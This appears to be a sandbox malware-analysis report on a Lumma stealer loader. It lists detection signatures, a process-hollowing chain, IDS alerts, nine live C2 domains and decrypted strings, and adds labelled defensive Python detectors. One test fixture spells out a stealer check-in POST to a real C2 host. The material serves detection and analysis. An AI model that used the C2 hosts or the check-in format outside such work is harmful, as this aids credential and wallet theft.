
Windows Analysis Report
R3nz_Loader.exe

Overview

General Information

Sample name: R3nz_Loader.exe
Analysis ID: 1582077
MD5: b43d8eca7777b170ddc40a824ab10bb6
SHA1: a7da0bbde621a7df3489b394ee4e5cea963225e6
SHA256: 1db1a4c253278293c863dff9759c6577f1b6b5b8f69ac0c612338453eeea96d9
Tags: exe, user-JaffaCakes118

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • R3nz_Loader.exe (PID: 2684 cmdline: "C:\Users\user\Desktop\R3nz_Loader.exe" MD5: B43D8ECA7777B170DDC40A824AB10BB6)
    • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 5780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
    • WerFault.exe (PID: 2676 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
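The process tree above is the host-side shape of the injection signatures listed under Signatures (a process created in suspended mode, a PE image written into a foreign process): the loader on the Desktop spawns the signed .NET utility aspnet_regiis.exe with a bare command line, the stealer then runs inside it, and the original loader crashes into WerFault. The detection below is an added example, not part of the Joe Sandbox report or of any product. It mirrors that tree in constructed Sysmon-style process-creation records (explorer.exe as the loader's parent and the two installer events are invented) and flags the hollowing pattern; the list of hollowing targets beyond aspnet_regiis.exe is an assumption drawn from common tradecraft, not from this report.

```python
"""Flag the loader -> aspnet_regiis.exe hollowing chain in process telemetry.

Added example; not from the Joe Sandbox report. Field names follow Sysmon
Event ID 1, but every record below is constructed for illustration.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcCreate:
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str


# Signed Microsoft binaries that loaders commonly hollow. aspnet_regiis.exe is
# the one this sample used; the rest are an assumption, not from the report.
HOLLOW_TARGETS = {"aspnet_regiis.exe", "regasm.exe", "regsvcs.exe",
                  "installutil.exe", "msbuild.exe"}
DOTNET_ROOT = "c:\\windows\\microsoft.net\\framework"
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def in_user_writable(path: str) -> bool:
    return any(seg in path.lower() for seg in USER_WRITABLE)


def has_no_arguments(cmdline: str, exe_name: str) -> bool:
    """True when the command line is just the (optionally quoted) image path.
    aspnet_regiis.exe only does something with switches (-i, -pe, ...); a bare
    launch means the parent only wanted a hollow, signed host process."""
    return cmdline.strip().strip('"').lower().endswith(exe_name)


def find_hollowing_chains(events):
    """Return (parent_pid, parent_name, child_pid, child_name) for each child
    that is a known hollowing target under the .NET Framework root, started
    without arguments by a parent running from a user-writable path. The
    parent image comes from the parent's own create event when we have it
    (beware PID reuse on long timelines), else from the child's ParentImage."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        child = basename(e.image)
        if child not in HOLLOW_TARGETS or not e.image.lower().startswith(DOTNET_ROOT):
            continue
        parent = by_pid.get(e.parent_pid)
        parent_image = parent.image if parent else e.parent_image
        if in_user_writable(parent_image) and has_no_arguments(e.cmdline, child):
            hits.append((e.parent_pid, basename(parent_image), e.pid, child))
    return hits


# Constructed records mirroring the report's tree; explorer.exe and the two
# installer events (PIDs 1234, 9001, 9002) are assumptions, not from the report.
NET4 = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_regiis.exe"
LOADER = "C:\\Users\\user\\Desktop\\R3nz_Loader.exe"
SAMPLE_EVENTS = [
    ProcCreate(2684, LOADER, f'"{LOADER}"', 1234, "C:\\Windows\\explorer.exe"),
    ProcCreate(6716, "C:\\Windows\\System32\\conhost.exe",
               "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1", 2684, LOADER),
    ProcCreate(5780, NET4, f'"{NET4}"', 2684, LOADER),
    ProcCreate(2676, "C:\\Windows\\SysWOW64\\WerFault.exe",
               "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 2684 -s 1224", 2684, LOADER),
    # Benign: an installer run from Downloads registers ASP.NET with a switch.
    ProcCreate(9001, "C:\\Users\\admin\\Downloads\\setup.exe",
               '"C:\\Users\\admin\\Downloads\\setup.exe" /quiet', 1234,
               "C:\\Windows\\explorer.exe"),
    ProcCreate(9002, NET4, f'"{NET4}" -iru', 9001,
               "C:\\Users\\admin\\Downloads\\setup.exe"),
]

if __name__ == "__main__":
    for hit in find_hollowing_chains(SAMPLE_EVENTS):
        print("hollowing candidate: parent %d (%s) -> child %d (%s)" % hit)
```

The bare-command-line test is what keeps the installer case quiet: a legitimate caller of aspnet_regiis.exe always passes a switch, whereas a loader that only needs a signed, suspended host to write into passes nothing.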
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["noisycuttej.shop", "framekgirus.shop", "nearycrepso.shop", "wholersorie.shop", "fancywaxxers.shop", "abruptyopsn.shop", "tirepublicerj.shop", "rabidcowse.shop", "cloudewahsj.shop"], "Build id": "BVnUqo--@youngesstt"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
00000003.00000003.2082382204.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
00000003.00000003.2065068299.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: R3nz_Loader.exe PID: 2684 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
(5 further memory-dump matches not included in this export)

Source | Rule | Description | Author
3.2.aspnet_regiis.exe.2760000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0.2.R3nz_Loader.exe.6cf01000.5.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0.2.R3nz_Loader.exe.6cf01000.5.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0.2.R3nz_Loader.exe.6cee0000.4.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0.2.R3nz_Loader.exe.a10000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
                          No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-29T23:36:55.447181+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:56.516425+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:57.936435+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:59.137265+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 104.21.32.1 | 443 | TCP
2024-12-29T23:37:00.850104+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49714 | 104.21.32.1 | 443 | TCP
2024-12-29T23:37:02.386572+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49715 | 104.21.32.1 | 443 | TCP
2024-12-29T23:37:04.357809+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49716 | 104.21.32.1 | 443 | TCP
2024-12-29T23:37:06.910342+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49717 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:55.916300+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:56.980247+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 104.21.32.1 | 443 | TCP
2024-12-29T23:37:07.362321+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49717 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:55.916300+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:56.980247+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 104.21.32.1 | 443 | TCP
2024-12-29T23:36:59.618823+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 104.21.32.1 | 443 | TCP


                          AV Detection

Source: https://fancywaxxers.shop/YB | Avira URL Cloud: Label: malware
Source: rabidcowse.shop | Avira URL Cloud: Label: malware
Source: wholersorie.shop | Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api9Bd | Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api_ | Avira URL Cloud: Label: malware
Source: fancywaxxers.shop | Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apiAB | Avira URL Cloud: Label: malware
Source: cloudewahsj.shop | Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/X | Avira URL Cloud: Label: malware
Source: noisycuttej.shop | Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/int32 | Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api | Avira URL Cloud: Label: malware
Source: framekgirus.shop | Avira URL Cloud: Label: malware
Source: nearycrepso.shop | Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/ | Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/n | Avira URL Cloud: Label: malware
Source: abruptyopsn.shop | Avira URL Cloud: Label: malware
Source: tirepublicerj.shop | Avira URL Cloud: Label: malware
Source: 3.2.aspnet_regiis.exe.2760000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "framekgirus.shop", "nearycrepso.shop", "wholersorie.shop", "fancywaxxers.shop", "abruptyopsn.shop", "tirepublicerj.shop", "rabidcowse.shop", "cloudewahsj.shop"], "Build id": "BVnUqo--@youngesstt"}
Source: R3nz_Loader.exe | ReversingLabs: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\gdi32.dll | Joe Sandbox ML: detected
Source: R3nz_Loader.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: cloudewahsj.shop
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: rabidcowse.shop
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: noisycuttej.shop
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: tirepublicerj.shop
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: framekgirus.shop
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: wholersorie.shop
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: abruptyopsn.shop
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: nearycrepso.shop
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: fancywaxxers.shop
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp | String decryptor: BVnUqo--@youngesstt
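The decrypted strings above, together with the extracted configuration, give everything needed for a first-pass network detection: nine C2 hostnames, the check-in user agent TeslaBrowser/5.5, the POST body format lid=%s&j=%s&ver=4.0, and the /api path that appears in the flagged URLs. The script below is an added example, not part of the report or of any vendor rule set. It turns the configuration into a domain match for proxy logs and a shape match for the check-in request. The configuration dict is copied from the report; the proxy log lines and the HTTP request are constructed, and the choice to put the build ID in lid is an assumption made for the example (the report shows only the format string).

```python
"""Network detections derived from the extracted LummaC configuration.

Added example; not part of the Joe Sandbox report. CONFIG is copied from the
report; the proxy log and the HTTP requests below are constructed.
"""
import re

CONFIG = {
    "C2 url": ["noisycuttej.shop", "framekgirus.shop", "nearycrepso.shop",
               "wholersorie.shop", "fancywaxxers.shop", "abruptyopsn.shop",
               "tirepublicerj.shop", "rabidcowse.shop", "cloudewahsj.shop"],
    "Build id": "BVnUqo--@youngesstt",
}

# Recovered by the report's string decryptor (AV Detection section above).
CHECKIN_UA = "TeslaBrowser/5.5"
CHECKIN_BODY = re.compile(r"^lid=(?P<lid>[^&]+)&j=(?P<j>[^&]*)&ver=(?P<ver>\d+\.\d+)$")


def c2_domains(cfg):
    """Bare lowercase hostnames; tolerates a scheme, port or path in an entry."""
    hosts = set()
    for entry in cfg["C2 url"]:
        host = entry.split("//")[-1].split("/")[0].split(":")[0].strip().lower()
        if host:
            hosts.add(host)
    return hosts


def host_matches(host, domains):
    """Exact or subdomain match, so api.<c2> is caught as well as <c2>."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def scan_proxy_log(lines, domains):
    """Return (client, host) for each line whose destination is a C2 domain.
    Line format (constructed, squid-like): <epoch> <client> <method> <url> <status>.
    CONNECT lines carry host:port, other methods a full URL."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        client, url = parts[1], parts[3]
        host = url.split("//")[-1].split("/")[0].split(":")[0]
        if host_matches(host, domains):
            hits.append((client, host.lower()))
    return hits


def parse_checkin(raw):
    """Return the check-in fields if the request has the Lumma shape
    (POST, TeslaBrowser UA, lid/j/ver form body), else None."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    if not request_line.startswith("POST "):
        return None
    headers = {}
    for h in header_lines:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    if headers.get("user-agent") != CHECKIN_UA:
        return None
    m = CHECKIN_BODY.match(body.strip())
    if not m:
        return None
    return {"host": headers.get("host"), "path": request_line.split()[1], **m.groupdict()}


# Constructed sample input (not captured traffic).
SAMPLE_PROXY_LOG = [
    "1735511815 192.168.2.5 CONNECT fancywaxxers.shop:443 200",
    "1735511816 192.168.2.7 GET http://www.example.com/index.html 200",
    "1735511817 192.168.2.5 CONNECT api.rabidcowse.shop:443 200",
]
SAMPLE_CHECKIN = (
    "POST /api HTTP/1.1\r\nHost: fancywaxxers.shop\r\nUser-Agent: TeslaBrowser/5.5\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "lid=BVnUqo--@youngesstt&j=&ver=4.0"  # lid = build id is an assumption
)
BENIGN_REQUEST = "GET / HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"

if __name__ == "__main__":
    print(scan_proxy_log(SAMPLE_PROXY_LOG, c2_domains(CONFIG)))
    print(parse_checkin(SAMPLE_CHECKIN))
```

The domain match is the durable part: all eight sessions in the Suricata table go to one Cloudflare address (104.21.32.1), so an IP block would hit unrelated sites, while the hostnames come straight from the configuration. The request-shape match only applies where TLS is terminated (as in the sandbox's sslproxydump.pcap); on the wire you are left with the SNI and the JA3 hash listed under Networking.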
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02775050 CryptUnprotectData
Source: R3nz_Loader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: R3nz_Loader.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
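Several of the signatures in the summary (nameless sections, a section name with special characters, sections with non-standard names) and the EXECUTABLE_IMAGE / 32BIT_MACHINE characteristics above all come from the COFF header and section table, which is cheap to check in triage before anything is detonated. The parser below is an added example and not the sandbox's own check: it reads only the headers with struct, builds a constructed stub PE to run against (the section names and flags in the stub are invented and do not reproduce this sample's layout), and reports the same kinds of findings. Its writable-plus-executable check is a static cousin of the runtime "changes PE section rights" signature, not the same test.

```python
"""Static PE section-table triage: nameless, odd-character and non-standard
section names, plus sections mapped both writable and executable.

Added example; not the sandbox's own check. The stub PE built below is
constructed for illustration and is not the sample's layout.
"""
import struct

IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_32BIT_MACHINE = 0x0100
SCN_CNT_CODE = 0x00000020
SCN_CNT_INITIALIZED_DATA = 0x00000040
SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_READ = 0x40000000
SCN_MEM_WRITE = 0x80000000

# Names emitted by mainstream linkers; anything else is "non-standard" here.
KNOWN_SECTIONS = {b".text", b".rdata", b".data", b".rsrc", b".reloc", b".idata",
                  b".edata", b".pdata", b".bss", b".tls", b".CRT"}
NAME_CHARS = set(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._$")


def parse_headers(data: bytes):
    """Return (coff_header_dict, list_of_section_dicts) from raw PE bytes."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsec, _ts, _symptr, _nsym, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    coff = {"machine": machine, "characteristics": chars, "sections": nsec}
    first = e_lfanew + 4 + 20 + opt_size  # section table follows the optional header
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, rptr, _, _, _, _, sc = struct.unpack_from(
            "<8sIIIIIIHHI", data, first + 40 * i)
        sections.append({"index": i, "name": name.rstrip(b"\0"), "vaddr": va,
                         "vsize": vsize, "raw_size": rsize, "raw_ptr": rptr,
                         "characteristics": sc})
    return coff, sections


def section_flags(sec):
    """Triage flags for one section."""
    flags = []
    name, sc = sec["name"], sec["characteristics"]
    if not name:
        flags.append("nameless")
    else:
        if any(b not in NAME_CHARS for b in name):
            flags.append("special-chars")
        if name not in KNOWN_SECTIONS:
            flags.append("non-standard-name")
    if sc & SCN_MEM_WRITE and sc & SCN_MEM_EXECUTE:
        flags.append("writable-executable")  # static hint of in-place unpacking
    return flags


def triage(data: bytes):
    coff, sections = parse_headers(data)
    return {
        "is_32bit": coff["machine"] == IMAGE_FILE_MACHINE_I386
                    and bool(coff["characteristics"] & IMAGE_FILE_32BIT_MACHINE),
        "is_executable_image": bool(coff["characteristics"] & IMAGE_FILE_EXECUTABLE_IMAGE),
        "sections": [(s["name"], section_flags(s)) for s in sections],
    }


def build_stub_pe(sections):
    """Constructed minimal PE32 header: DOS stub, PE signature, COFF header,
    zeroed optional header with the PE32 magic, then one 40-byte entry per
    (name, characteristics) pair. Not loadable; enough for header parsing."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # IMAGE_NT_OPTIONAL_HDR32_MAGIC
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, len(sections), 0, 0, 0,
                       len(opt), IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name, 0x1000, 0x1000 * (i + 1), 0x200,
                    0x400 + 0x200 * i, 0, 0, 0, 0, ch)
        for i, (name, ch) in enumerate(sections))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


# Invented layout exercising each finding; not the sample's section table.
SAMPLE_PE = build_stub_pe([
    (b".text", SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ),
    (b"", SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ | SCN_MEM_WRITE | SCN_MEM_EXECUTE),
    (b".\x01\x7f", SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ | SCN_MEM_WRITE),
    (b"UPX1", SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ),
    (b".rdata", SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ),
])

if __name__ == "__main__":
    for name, flags in triage(SAMPLE_PE)["sections"]:
        print(repr(name), flags or "ok")
```

None of these flags is malicious on its own (packed but legitimate software trips the non-standard-name check routinely), which is why the report scores them as supporting signatures rather than as the detection itself; what made this sample a clear verdict was the YARA and configuration hits on the unpacked memory.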
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb | source: R3nz_Loader.exe, 00000000.00000002.2234322124.00000000012C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\R3nz_Loader.PDB | source: R3nz_Loader.exe, 00000000.00000002.2234322124.00000000012C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: %%.pdb | source: R3nz_Loader.exe, 00000000.00000002.2233663238.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Desktop\R3nz_Loader.PDB | source: R3nz_Loader.exe, 00000000.00000002.2233663238.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb | source: WER3C4D.tmp.dmp.6.dr
Source: Binary string: mscorlib.ni.pdb | source: WER3C4D.tmp.dmp.6.dr
Source: Binary string: n0C:\Windows\mscorlib.pdb | source: R3nz_Loader.exe, 00000000.00000002.2233663238.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbLL | source: R3nz_Loader.exe, 00000000.00000002.2234322124.0000000001339000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb | source: R3nz_Loader.exe, 00000000.00000002.2234322124.00000000012EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb | source: R3nz_Loader.exe, 00000000.00000002.2234322124.0000000001339000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb8 | source: R3nz_Loader.exe, 00000000.00000002.2234322124.0000000001326000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS | source: WER3C4D.tmp.dmp.6.dr
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEF4322 FindFirstFileExW
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 0_2_00A706A0
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], D6EFB4E0h | 0_2_00A706A0
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+18h] | 0_2_00A45E50
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-0002D61Ah] | 0_2_00A71BB0
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h | 0_2_00A71BB0
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 4x nop then mov ecx, edi | 0_2_00A38F60
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh | 0_2_00A71960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+4F03650Ah] | 3_2_02785A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [ecx], dx | 3_2_0276D3E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [eax], dx | 3_2_02775050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [esi], ax | 3_2_0279D0CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [edi], al | 3_2_0278A8C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx eax, byte ptr [ecx+ebx] | 3_2_0278208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, ecx | 3_2_0279B150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, ebx | 3_2_0279B150
